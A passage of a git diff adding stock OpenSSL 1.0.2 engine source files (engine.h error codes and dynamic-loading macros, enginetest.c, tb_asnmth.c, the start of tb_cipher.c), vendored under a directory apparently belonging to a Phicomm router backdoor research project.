+ * by the "dynamic" ENGINE, these types are needed. The 'dynamic_fns'
+ * structure type provides the calling application's (or library's) error
+ * functionality and memory management function pointers to the loaded
+ * library. These should be used/set in the loaded library code so that the
+ * loading application's 'state' will be used/changed in all operations. The
+ * 'static_state' pointer allows the loaded library to know if it shares the
+ * same static data as the calling application (or library), and thus whether
+ * these callbacks need to be set or not.
+ */
+typedef void *(*dyn_MEM_malloc_cb) (size_t);
+typedef void *(*dyn_MEM_realloc_cb) (void *, size_t);
+typedef void (*dyn_MEM_free_cb) (void *);
+typedef struct st_dynamic_MEM_fns {
+    dyn_MEM_malloc_cb malloc_cb;
+    dyn_MEM_realloc_cb realloc_cb;
+    dyn_MEM_free_cb free_cb;
+} dynamic_MEM_fns;
+/*
+ * FIXME: Perhaps the memory and locking code (crypto.h) should declare and
+ * use these types so we (and any other dependant code) can simplify a bit??
+ */
+typedef void (*dyn_lock_locking_cb) (int, int, const char *, int);
+typedef int (*dyn_lock_add_lock_cb) (int *, int, int, const char *, int);
+typedef struct CRYPTO_dynlock_value *(*dyn_dynlock_create_cb) (const char *,
+                                                               int);
+typedef void (*dyn_dynlock_lock_cb) (int, struct CRYPTO_dynlock_value *,
+                                     const char *, int);
+typedef void (*dyn_dynlock_destroy_cb) (struct CRYPTO_dynlock_value *,
+                                        const char *, int);
+typedef struct st_dynamic_LOCK_fns {
+    dyn_lock_locking_cb lock_locking_cb;
+    dyn_lock_add_lock_cb lock_add_lock_cb;
+    dyn_dynlock_create_cb dynlock_create_cb;
+    dyn_dynlock_lock_cb dynlock_lock_cb;
+    dyn_dynlock_destroy_cb dynlock_destroy_cb;
+} dynamic_LOCK_fns;
+/* The top-level structure */
+typedef struct st_dynamic_fns {
+    void *static_state;
+    const ERR_FNS *err_fns;
+    const CRYPTO_EX_DATA_IMPL *ex_data_fns;
+    dynamic_MEM_fns mem_fns;
+    dynamic_LOCK_fns lock_fns;
+} dynamic_fns;
+
+/*
+ * The version checking function should be of this prototype. NB: The
+ * ossl_version value passed in is the OSSL_DYNAMIC_VERSION of the loading
+ * code. If this function returns zero, it indicates a (potential) version
+ * incompatibility and the loaded library doesn't believe it can proceed.
+ * Otherwise, the returned value is the (latest) version supported by the
+ * loading library. The loader may still decide that the loaded code's
+ * version is unsatisfactory and could veto the load. The function is
+ * expected to be implemented with the symbol name "v_check", and a default
+ * implementation can be fully instantiated with
+ * IMPLEMENT_DYNAMIC_CHECK_FN().
+ */
+typedef unsigned long (*dynamic_v_check_fn) (unsigned long ossl_version);
+# define IMPLEMENT_DYNAMIC_CHECK_FN() \
+        OPENSSL_EXPORT unsigned long v_check(unsigned long v); \
+        OPENSSL_EXPORT unsigned long v_check(unsigned long v) { \
+                if(v >= OSSL_DYNAMIC_OLDEST) return OSSL_DYNAMIC_VERSION; \
+                return 0; }
+
+/*
+ * This function is passed the ENGINE structure to initialise with its own
+ * function and command settings. It should not adjust the structural or
+ * functional reference counts. If this function returns zero, (a) the load
+ * will be aborted, (b) the previous ENGINE state will be memcpy'd back onto
+ * the structure, and (c) the shared library will be unloaded. So
+ * implementations should do their own internal cleanup in failure
+ * circumstances otherwise they could leak. The 'id' parameter, if non-NULL,
+ * represents the ENGINE id that the loader is looking for. If this is NULL,
+ * the shared library can choose to return failure or to initialise a
+ * 'default' ENGINE. If non-NULL, the shared library must initialise only an
+ * ENGINE matching the passed 'id'. The function is expected to be
+ * implemented with the symbol name "bind_engine". A standard implementation
+ * can be instantiated with IMPLEMENT_DYNAMIC_BIND_FN(fn) where the parameter
+ * 'fn' is a callback function that populates the ENGINE structure and
+ * returns an int value (zero for failure). 'fn' should have prototype;
+ * [static] int fn(ENGINE *e, const char *id);
+ */
+typedef int (*dynamic_bind_engine) (ENGINE *e, const char *id,
+                                    const dynamic_fns *fns);
+# define IMPLEMENT_DYNAMIC_BIND_FN(fn) \
+        OPENSSL_EXPORT \
+        int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns); \
+        OPENSSL_EXPORT \
+        int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns) { \
+                if(ENGINE_get_static_state() == fns->static_state) goto skip_cbs; \
+                if(!CRYPTO_set_mem_functions(fns->mem_fns.malloc_cb, \
+                        fns->mem_fns.realloc_cb, fns->mem_fns.free_cb)) \
+                        return 0; \
+                CRYPTO_set_locking_callback(fns->lock_fns.lock_locking_cb); \
+                CRYPTO_set_add_lock_callback(fns->lock_fns.lock_add_lock_cb); \
+                CRYPTO_set_dynlock_create_callback(fns->lock_fns.dynlock_create_cb); \
+                CRYPTO_set_dynlock_lock_callback(fns->lock_fns.dynlock_lock_cb); \
+                CRYPTO_set_dynlock_destroy_callback(fns->lock_fns.dynlock_destroy_cb); \
+                if(!CRYPTO_set_ex_data_implementation(fns->ex_data_fns)) \
+                        return 0; \
+                if(!ERR_set_implementation(fns->err_fns)) return 0; \
+        skip_cbs: \
+                if(!fn(e,id)) return 0; \
+                return 1; }
+
+/*
+ * If the loading application (or library) and the loaded ENGINE library
+ * share the same static data (eg. they're both dynamically linked to the
+ * same libcrypto.so) we need a way to avoid trying to set system callbacks -
+ * this would fail, and for the same reason that it's unnecessary to try. If
+ * the loaded ENGINE has (or gets from through the loader) its own copy of
+ * the libcrypto static data, we will need to set the callbacks. The easiest
+ * way to detect this is to have a function that returns a pointer to some
+ * static data and let the loading application and loaded ENGINE compare
+ * their respective values.
+ */
+void *ENGINE_get_static_state(void);
+
+# if defined(__OpenBSD__) || defined(__FreeBSD__) || defined(HAVE_CRYPTODEV)
+void ENGINE_setup_bsd_cryptodev(void);
+# endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_ENGINE_strings(void);
+
+/* Error codes for the ENGINE functions. */
+
+/* Function codes. */
+# define ENGINE_F_DYNAMIC_CTRL                            180
+# define ENGINE_F_DYNAMIC_GET_DATA_CTX                    181
+# define ENGINE_F_DYNAMIC_LOAD                            182
+# define ENGINE_F_DYNAMIC_SET_DATA_CTX                    183
+# define ENGINE_F_ENGINE_ADD                              105
+# define ENGINE_F_ENGINE_BY_ID                            106
+# define ENGINE_F_ENGINE_CMD_IS_EXECUTABLE                170
+# define ENGINE_F_ENGINE_CTRL                             142
+# define ENGINE_F_ENGINE_CTRL_CMD                         178
+# define ENGINE_F_ENGINE_CTRL_CMD_STRING                  171
+# define ENGINE_F_ENGINE_FINISH                           107
+# define ENGINE_F_ENGINE_FREE_UTIL                        108
+# define ENGINE_F_ENGINE_GET_CIPHER                       185
+# define ENGINE_F_ENGINE_GET_DEFAULT_TYPE                 177
+# define ENGINE_F_ENGINE_GET_DIGEST                       186
+# define ENGINE_F_ENGINE_GET_NEXT                         115
+# define ENGINE_F_ENGINE_GET_PKEY_ASN1_METH               193
+# define ENGINE_F_ENGINE_GET_PKEY_METH                    192
+# define ENGINE_F_ENGINE_GET_PREV                         116
+# define ENGINE_F_ENGINE_INIT                             119
+# define ENGINE_F_ENGINE_LIST_ADD                         120
+# define ENGINE_F_ENGINE_LIST_REMOVE                      121
+# define ENGINE_F_ENGINE_LOAD_PRIVATE_KEY                 150
+# define ENGINE_F_ENGINE_LOAD_PUBLIC_KEY                  151
+# define ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT             194
+# define ENGINE_F_ENGINE_NEW                              122
+# define ENGINE_F_ENGINE_REMOVE                           123
+# define ENGINE_F_ENGINE_SET_DEFAULT_STRING               189
+# define ENGINE_F_ENGINE_SET_DEFAULT_TYPE                 126
+# define ENGINE_F_ENGINE_SET_ID                           129
+# define ENGINE_F_ENGINE_SET_NAME                         130
+# define ENGINE_F_ENGINE_TABLE_REGISTER                   184
+# define ENGINE_F_ENGINE_UNLOAD_KEY                       152
+# define ENGINE_F_ENGINE_UNLOCKED_FINISH                  191
+# define ENGINE_F_ENGINE_UP_REF                           190
+# define ENGINE_F_INT_CTRL_HELPER                         172
+# define ENGINE_F_INT_ENGINE_CONFIGURE                    188
+# define ENGINE_F_INT_ENGINE_MODULE_INIT                  187
+# define ENGINE_F_LOG_MESSAGE                             141
+
+/* Reason codes. */
+# define ENGINE_R_ALREADY_LOADED                          100
+# define ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER                133
+# define ENGINE_R_CMD_NOT_EXECUTABLE                      134
+# define ENGINE_R_COMMAND_TAKES_INPUT                     135
+# define ENGINE_R_COMMAND_TAKES_NO_INPUT                  136
+# define ENGINE_R_CONFLICTING_ENGINE_ID                   103
+# define ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED            119
+# define ENGINE_R_DH_NOT_IMPLEMENTED                      139
+# define ENGINE_R_DSA_NOT_IMPLEMENTED                     140
+# define ENGINE_R_DSO_FAILURE                             104
+# define ENGINE_R_DSO_NOT_FOUND                           132
+# define ENGINE_R_ENGINES_SECTION_ERROR                   148
+# define ENGINE_R_ENGINE_CONFIGURATION_ERROR              102
+# define ENGINE_R_ENGINE_IS_NOT_IN_LIST                   105
+# define ENGINE_R_ENGINE_SECTION_ERROR                    149
+# define ENGINE_R_FAILED_LOADING_PRIVATE_KEY              128
+# define ENGINE_R_FAILED_LOADING_PUBLIC_KEY               129
+# define ENGINE_R_FINISH_FAILED                           106
+# define ENGINE_R_GET_HANDLE_FAILED                       107
+# define ENGINE_R_ID_OR_NAME_MISSING                      108
+# define ENGINE_R_INIT_FAILED                             109
+# define ENGINE_R_INTERNAL_LIST_ERROR                     110
+# define ENGINE_R_INVALID_ARGUMENT                        143
+# define ENGINE_R_INVALID_CMD_NAME                        137
+# define ENGINE_R_INVALID_CMD_NUMBER                      138
+# define ENGINE_R_INVALID_INIT_VALUE                      151
+# define ENGINE_R_INVALID_STRING                          150
+# define ENGINE_R_NOT_INITIALISED                         117
+# define ENGINE_R_NOT_LOADED                              112
+# define ENGINE_R_NO_CONTROL_FUNCTION                     120
+# define ENGINE_R_NO_INDEX                                144
+# define ENGINE_R_NO_LOAD_FUNCTION                        125
+# define ENGINE_R_NO_REFERENCE                            130
+# define ENGINE_R_NO_SUCH_ENGINE                          116
+# define ENGINE_R_NO_UNLOAD_FUNCTION                      126
+# define ENGINE_R_PROVIDE_PARAMETERS                      113
+# define ENGINE_R_RSA_NOT_IMPLEMENTED                     141
+# define ENGINE_R_UNIMPLEMENTED_CIPHER                    146
+# define ENGINE_R_UNIMPLEMENTED_DIGEST                    147
+# define ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD         101
+# define ENGINE_R_VERSION_INCOMPATIBILITY                 145
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/enginetest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/enginetest.c
new file mode 100644
index 0000000..ab7c0c0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/enginetest.c
@@ -0,0 +1,269 @@
+/* crypto/engine/enginetest.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/e_os2.h>
+
+#ifdef OPENSSL_NO_ENGINE
+int main(int argc, char *argv[])
+{
+    printf("No ENGINE support\n");
+    return (0);
+}
+#else
+# include <openssl/buffer.h>
+# include <openssl/crypto.h>
+# include <openssl/engine.h>
+# include <openssl/err.h>
+
+static void display_engine_list(void)
+{
+    ENGINE *h;
+    int loop;
+
+    h = ENGINE_get_first();
+    loop = 0;
+    printf("listing available engine types\n");
+    while (h) {
+        printf("engine %i, id = \"%s\", name = \"%s\"\n",
+               loop++, ENGINE_get_id(h), ENGINE_get_name(h));
+        h = ENGINE_get_next(h);
+    }
+    printf("end of list\n");
+    /*
+     * ENGINE_get_first() increases the struct_ref counter, so we must call
+     * ENGINE_free() to decrease it again
+     */
+    ENGINE_free(h);
+}
+
+int main(int argc, char *argv[])
+{
+    ENGINE *block[512];
+    char buf[256];
+    const char *id, *name;
+    ENGINE *ptr;
+    int loop;
+    int to_return = 1;
+    ENGINE *new_h1 = NULL;
+    ENGINE *new_h2 = NULL;
+    ENGINE *new_h3 = NULL;
+    ENGINE *new_h4 = NULL;
+
+    /* enable memory leak checking unless explicitly disabled */
+    if (!((getenv("OPENSSL_DEBUG_MEMORY") != NULL)
+          && (0 == strcmp(getenv("OPENSSL_DEBUG_MEMORY"), "off")))) {
+        CRYPTO_malloc_debug_init();
+        CRYPTO_set_mem_debug_options(V_CRYPTO_MDEBUG_ALL);
+    } else {
+        /* OPENSSL_DEBUG_MEMORY=off */
+        CRYPTO_set_mem_debug_functions(0, 0, 0, 0, 0);
+    }
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+    ERR_load_crypto_strings();
+
+    memset(block, 0, 512 * sizeof(ENGINE *));
+    if (((new_h1 = ENGINE_new()) == NULL) ||
+        !ENGINE_set_id(new_h1, "test_id0") ||
+        !ENGINE_set_name(new_h1, "First test item") ||
+        ((new_h2 = ENGINE_new()) == NULL) ||
+        !ENGINE_set_id(new_h2, "test_id1") ||
+        !ENGINE_set_name(new_h2, "Second test item") ||
+        ((new_h3 = ENGINE_new()) == NULL) ||
+        !ENGINE_set_id(new_h3, "test_id2") ||
+        !ENGINE_set_name(new_h3, "Third test item") ||
+        ((new_h4 = ENGINE_new()) == NULL) ||
+        !ENGINE_set_id(new_h4, "test_id3") ||
+        !ENGINE_set_name(new_h4, "Fourth test item")) {
+        printf("Couldn't set up test ENGINE structures\n");
+        goto end;
+    }
+    printf("\nenginetest beginning\n\n");
+    display_engine_list();
+    if (!ENGINE_add(new_h1)) {
+        printf("Add failed!\n");
+        goto end;
+    }
+    display_engine_list();
+    ptr = ENGINE_get_first();
+    if (!ENGINE_remove(ptr)) {
+        printf("Remove failed!\n");
+        goto end;
+    }
+    if (ptr)
+        ENGINE_free(ptr);
+    display_engine_list();
+    if (!ENGINE_add(new_h3) || !ENGINE_add(new_h2)) {
+        printf("Add failed!\n");
+        goto end;
+    }
+    display_engine_list();
+    if (!ENGINE_remove(new_h2)) {
+        printf("Remove failed!\n");
+        goto end;
+    }
+    display_engine_list();
+    if (!ENGINE_add(new_h4)) {
+        printf("Add failed!\n");
+        goto end;
+    }
+    display_engine_list();
+    if (ENGINE_add(new_h3)) {
+        printf("Add *should* have failed but didn't!\n");
+        goto end;
+    } else
+        printf("Add that should fail did.\n");
+    ERR_clear_error();
+    if (ENGINE_remove(new_h2)) {
+        printf("Remove *should* have failed but didn't!\n");
+        goto end;
+    } else
+        printf("Remove that should fail did.\n");
+    ERR_clear_error();
+    if (!ENGINE_remove(new_h3)) {
+        printf("Remove failed!\n");
+        goto end;
+    }
+    display_engine_list();
+    if (!ENGINE_remove(new_h4)) {
+        printf("Remove failed!\n");
+        goto end;
+    }
+    display_engine_list();
+    /*
+     * Depending on whether there's any hardware support compiled in, this
+     * remove may be destined to fail.
+     */
+    ptr = ENGINE_get_first();
+    if (ptr)
+        if (!ENGINE_remove(ptr))
+            printf("Remove failed!i - probably no hardware "
+                   "support present.\n");
+    if (ptr)
+        ENGINE_free(ptr);
+    display_engine_list();
+    if (!ENGINE_add(new_h1) || !ENGINE_remove(new_h1)) {
+        printf("Couldn't add and remove to an empty list!\n");
+        goto end;
+    } else
+        printf("Successfully added and removed to an empty list!\n");
+    printf("About to beef up the engine-type list\n");
+    for (loop = 0; loop < 512; loop++) {
+        sprintf(buf, "id%i", loop);
+        id = BUF_strdup(buf);
+        sprintf(buf, "Fake engine type %i", loop);
+        name = BUF_strdup(buf);
+        if (((block[loop] = ENGINE_new()) == NULL) ||
+            !ENGINE_set_id(block[loop], id) ||
+            !ENGINE_set_name(block[loop], name)) {
+            printf("Couldn't create block of ENGINE structures.\n"
+                   "I'll probably also core-dump now, damn.\n");
+            goto end;
+        }
+    }
+    for (loop = 0; loop < 512; loop++) {
+        if (!ENGINE_add(block[loop])) {
+            printf("\nAdding stopped at %i, (%s,%s)\n",
+                   loop, ENGINE_get_id(block[loop]),
+                   ENGINE_get_name(block[loop]));
+            goto cleanup_loop;
+        } else
+            printf(".");
+        fflush(stdout);
+    }
+ cleanup_loop:
+    printf("\nAbout to empty the engine-type list\n");
+    while ((ptr = ENGINE_get_first()) != NULL) {
+        if (!ENGINE_remove(ptr)) {
+            printf("\nRemove failed!\n");
+            goto end;
+        }
+        ENGINE_free(ptr);
+        printf(".");
+        fflush(stdout);
+    }
+    for (loop = 0; loop < 512; loop++) {
+        OPENSSL_free((void *)ENGINE_get_id(block[loop]));
+        OPENSSL_free((void *)ENGINE_get_name(block[loop]));
+    }
+    printf("\nTests completed happily\n");
+    to_return = 0;
+ end:
+    if (to_return)
+        ERR_print_errors_fp(stderr);
+    if (new_h1)
+        ENGINE_free(new_h1);
+    if (new_h2)
+        ENGINE_free(new_h2);
+    if (new_h3)
+        ENGINE_free(new_h3);
+    if (new_h4)
+        ENGINE_free(new_h4);
+    for (loop = 0; loop < 512; loop++)
+        if (block[loop])
+            ENGINE_free(block[loop]);
+    ENGINE_cleanup();
+    CRYPTO_cleanup_all_ex_data();
+    ERR_free_strings();
+    ERR_remove_thread_state(NULL);
+    CRYPTO_mem_leaks_fp(stderr);
+    return to_return;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_asnmth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_asnmth.c
new file mode 100644
index 0000000..a1a9b88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_asnmth.c
@@ -0,0 +1,246 @@
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+#include "asn1_locl.h"
+#include <openssl/evp.h>
+
+/*
+ * If this symbol is defined then ENGINE_get_pkey_asn1_meth_engine(), the
+ * function that is used by EVP to hook in pkey_asn1_meth code and cache
+ * defaults (etc), will display brief debugging summaries to stderr with the
+ * 'nid'.
+ */
+/* #define ENGINE_PKEY_ASN1_METH_DEBUG */
+
+static ENGINE_TABLE *pkey_asn1_meth_table = NULL;
+
+void ENGINE_unregister_pkey_asn1_meths(ENGINE *e)
+{
+    engine_table_unregister(&pkey_asn1_meth_table, e);
+}
+
+static void engine_unregister_all_pkey_asn1_meths(void)
+{
+    engine_table_cleanup(&pkey_asn1_meth_table);
+}
+
+int ENGINE_register_pkey_asn1_meths(ENGINE *e)
+{
+    if (e->pkey_asn1_meths) {
+        const int *nids;
+        int num_nids = e->pkey_asn1_meths(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&pkey_asn1_meth_table,
+                                         engine_unregister_all_pkey_asn1_meths,
+                                         e, nids, num_nids, 0);
+    }
+    return 1;
+}
+
+void ENGINE_register_all_pkey_asn1_meths(void)
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        ENGINE_register_pkey_asn1_meths(e);
+}
+
+int ENGINE_set_default_pkey_asn1_meths(ENGINE *e)
+{
+    if (e->pkey_asn1_meths) {
+        const int *nids;
+        int num_nids = e->pkey_asn1_meths(e, NULL, &nids, 0);
+        if (num_nids > 0)
+            return engine_table_register(&pkey_asn1_meth_table,
+                                         engine_unregister_all_pkey_asn1_meths,
+                                         e, nids, num_nids, 1);
+    }
+    return 1;
+}
+
+/*
+ * Exposed API function to get a functional reference from the implementation
+ * table (ie. try to get a functional reference from the tabled structural
+ * references) for a given pkey_asn1_meth 'nid'
+ */
+ENGINE *ENGINE_get_pkey_asn1_meth_engine(int nid)
+{
+    return engine_table_select(&pkey_asn1_meth_table, nid);
+}
+
+/*
+ * Obtains a pkey_asn1_meth implementation from an ENGINE functional
+ * reference
+ */
+const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth(ENGINE *e, int nid)
+{
+    EVP_PKEY_ASN1_METHOD *ret;
+    ENGINE_PKEY_ASN1_METHS_PTR fn = ENGINE_get_pkey_asn1_meths(e);
+    if (!fn || !fn(e, &ret, NULL, nid)) {
+        ENGINEerr(ENGINE_F_ENGINE_GET_PKEY_ASN1_METH,
+                  ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD);
+        return NULL;
+    }
+    return ret;
+}
+
+/* Gets the pkey_asn1_meth callback from an ENGINE structure */
+ENGINE_PKEY_ASN1_METHS_PTR ENGINE_get_pkey_asn1_meths(const ENGINE *e)
+{
+    return e->pkey_asn1_meths;
+}
+
+/* Sets the pkey_asn1_meth callback in an ENGINE structure */
+int ENGINE_set_pkey_asn1_meths(ENGINE *e, ENGINE_PKEY_ASN1_METHS_PTR f)
+{
+    e->pkey_asn1_meths = f;
+    return 1;
+}
+
+/*
+ * Internal function to free up EVP_PKEY_ASN1_METHOD structures before an
+ * ENGINE is destroyed
+ */
+
+void engine_pkey_asn1_meths_free(ENGINE *e)
+{
+    int i;
+    EVP_PKEY_ASN1_METHOD *pkm;
+    if (e->pkey_asn1_meths) {
+        const int *pknids;
+        int npknids;
+        npknids = e->pkey_asn1_meths(e, NULL, &pknids, 0);
+        for (i = 0; i < npknids; i++) {
+            if (e->pkey_asn1_meths(e, &pkm, NULL, pknids[i])) {
+                EVP_PKEY_asn1_free(pkm);
+            }
+        }
+    }
+}
+
+/*
+ * Find a method based on a string. This does a linear search through all
+ * implemented algorithms. This is OK in practice because only a small number
+ * of algorithms are likely to be implemented in an engine and it is not used
+ * for speed critical operations.
+ */
+
+const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth_str(ENGINE *e,
+                                                          const char *str,
+                                                          int len)
+{
+    int i, nidcount;
+    const int *nids;
+    EVP_PKEY_ASN1_METHOD *ameth;
+    if (!e->pkey_asn1_meths)
+        return NULL;
+    if (len == -1)
+        len = strlen(str);
+    nidcount = e->pkey_asn1_meths(e, NULL, &nids, 0);
+    for (i = 0; i < nidcount; i++) {
+        e->pkey_asn1_meths(e, &ameth, NULL, nids[i]);
+        if (((int)strlen(ameth->pem_str) == len) &&
+            !strncasecmp(ameth->pem_str, str, len))
+            return ameth;
+    }
+    return NULL;
+}
+
+typedef struct {
+    ENGINE *e;
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    const char *str;
+    int len;
+} ENGINE_FIND_STR;
+
+static void look_str_cb(int nid, STACK_OF(ENGINE) *sk, ENGINE *def, void *arg)
+{
+    ENGINE_FIND_STR *lk = arg;
+    int i;
+    if (lk->ameth)
+        return;
+    for (i = 0; i < sk_ENGINE_num(sk); i++) {
+        ENGINE *e = sk_ENGINE_value(sk, i);
+        EVP_PKEY_ASN1_METHOD *ameth;
+        e->pkey_asn1_meths(e, &ameth, NULL, nid);
+        if (((int)strlen(ameth->pem_str) == lk->len) &&
+            !strncasecmp(ameth->pem_str, lk->str, lk->len)) {
+            lk->e = e;
+            lk->ameth = ameth;
+            return;
+        }
+    }
+}
+
+const EVP_PKEY_ASN1_METHOD *ENGINE_pkey_asn1_find_str(ENGINE **pe,
+                                                      const char *str,
+                                                      int len)
+{
+    ENGINE_FIND_STR fstr;
+    fstr.e = NULL;
+    fstr.ameth = NULL;
+    fstr.str = str;
+    fstr.len = len;
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    engine_table_doall(pkey_asn1_meth_table, look_str_cb, &fstr);
+    /* If found obtain a structural reference to engine */
+    if (fstr.e) {
+        fstr.e->struct_ref++;
+        engine_ref_debug(fstr.e, 0, 1)
+    }
+    *pe = fstr.e;
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return fstr.ameth;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_cipher.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_cipher.c
new file mode 100644
index 0000000..fcfb2ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_cipher.c
@@ -0,0 +1,143 @@
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
